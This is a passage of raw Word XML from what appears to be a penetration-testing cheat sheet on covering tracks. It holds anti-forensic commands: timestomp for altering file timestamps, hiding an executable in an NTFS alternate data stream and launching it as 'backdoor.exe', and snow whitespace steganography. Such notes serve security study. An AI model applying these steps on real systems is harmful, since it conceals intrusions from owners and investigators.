          </w:tcPr>
          <w:p w14:paraId="593C8C8B" w14:textId="77777777" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00604F8E"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="02E89D25" w14:textId="77777777" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30E15674" w14:textId="77777777" w:rsidR="00C84DDE" w:rsidRPr="001E0F42" w:rsidRDefault="00C84DDE" w:rsidP="00604F8E"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="241CB866" w14:textId="645E8236" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A87B0F" w14:textId="47E7DD66" w:rsidR="00BB63D6" w:rsidRDefault="00065914" w:rsidP="00BB63D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00065914">
        <w:lastRenderedPageBreak/>
        <w:t>Maintaining Access and Covering Tracks</w:t>
      </w:r>
      <w:r w:rsidR="00BB63D6">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BB63D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MACE Attributes | timestomp</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="722"/>
        <w:gridCol w:w="2372"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB63D6" w14:paraId="7BF03209" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="66739AE7" w14:textId="38B4957A" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>131.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="7C0A790A" w14:textId="212140E2" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>MACE Attributes</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D26EC4" w14:textId="73EE5097" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MACE stands for </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB63D6">
              <w:t>modified, accessed, created, entry</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. These attributes surrounding a file will </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB63D6">
              <w:t>immediately change</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> when someone interacts with a file</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB63D6">
              <w:t>, which indicates to the file user or owner that someone has read or modified the information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="3F8421E9" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="48BC857F" w14:textId="136419AB" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>131.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="035A274A" w14:textId="1BEF059F" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>timestomp</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00065914" w:rsidRPr="00065914">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(meterpreter command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4A0A90" w14:textId="2623ED81" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r w:rsidRPr="00BB63D6">
              <w:t>To leave no trace of these MACE attributes, use the timestomp command to change the attributes as you wish after accessing a file</w:t>
            </w:r>
            <w:r>
              <w:t>. To view</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D">
              <w:t xml:space="preserve"> the attributes, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00851E7D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">timestomp </w:t>
            </w:r>
            <w:r w:rsidRPr="00851E7D">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00851E7D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -v</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00851E7D">
              <w:t>This displays the created time, accessed time, modified time, and entry modified time</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D">
              <w:br/>
              <w:t>To change a value, use:</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00851E7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>timestomp</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00065914">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">FILE.txt </w:t>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-m </w:t>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>02/11/2018 8:10:03</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D" w:rsidRPr="00065914">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00851E7D">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
              <w:t>-a</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
              <w:t>Change accessed time</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
              <w:t>-c</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
              <w:t>Change created time</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
              <w:t>=e</w:t>
            </w:r>
            <w:r w:rsidR="00065914">
              <w:tab/>
              <w:t>Change entry modified time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="3402CF30" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="0EA97DF1" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="175130AA" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20C4ABE2" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="001E0F42" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D4F5FB5" w14:textId="2B1091A5" w:rsidR="00266703" w:rsidRDefault="00266703" w:rsidP="00814CF0"/>
    <w:p w14:paraId="35B036AB" w14:textId="77777777" w:rsidR="00266703" w:rsidRDefault="00266703">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD47423" w14:textId="581BD4BA" w:rsidR="00266703" w:rsidRDefault="00266703" w:rsidP="00266703">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00065914">
        <w:lastRenderedPageBreak/>
        <w:t>Maintaining Access and Covering Tracks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00640FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTFS Streams</w:t>
      </w:r>
      <w:r w:rsidR="00B34B21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | White Space Steganography</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1001"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="722"/>
        <w:gridCol w:w="2372"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C708F1" w14:paraId="36729569" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="53CAFE39" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>132.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="2D87B676" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>NTFS Streams</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00640FE0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(CMD command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>s, used on Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00640FE0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A6F99F8" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="00266703">
              <w:t>NTFS is a file system that stores any file with the help of two data streams, called NTFS data streams, along with file attributes. The first data stream stores the security descriptor for the file to be stored such as permissions; the second stores the data within a file. Alternate data streams are another type of named data stream that can be present within each file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="68A1E066" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="64DAC093" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>132.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="371AA2AA" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13DF36BE" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>To hide a file inside another file on Windows, use a colon like such:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">type </w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>c:\magic\calc.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>c:\magic\readme.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00640FE0">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>calc.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:t xml:space="preserve">The above command, </w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:t>, will write the calc.exe program into the readme.txt file but as a hidden part of the file thanks to the colon.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7543C879" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>This usually will not change the size of the file when looked at using ‘dir’ or ‘ls’.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446EC5AA" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>Now, you can delete the original file, here the calc.exe, and then make a link using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00266703">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mklink </w:t>
            </w:r>
            <w:r w:rsidRPr="00640FE0">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t xml:space="preserve">backdoor.exe </w:t>
            </w:r>
            <w:r w:rsidRPr="00640FE0">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>readme.txt:calc.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00640FE0">
              <w:t>Now to open the file, simply use:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00640FE0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>backdoor.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="73EA61F1" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:trPr>
          <w:trHeight w:val="1092"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="252A9A80" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>132.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="6E75D420" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Steganography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3957AF3C" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r w:rsidRPr="00B34B21">
              <w:t>Whitespace steganography is used to conceal messages in ASCII text by adding white spaces to the end of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If the built-in encryption is used, the message cannot be read even if it is detected</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="6D2F2976" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:trPr>
          <w:trHeight w:val="2136"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="01BC4FE5" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>132.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="3051A2B0" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>snow</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B614B2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(snow is a Windows program)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46DB1102" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:r>
              <w:t>Within Windows, snow is a program that can create hidden messages inside of files:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">snow </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-C -m </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TEXT GOES HERE</w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00300AA2">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
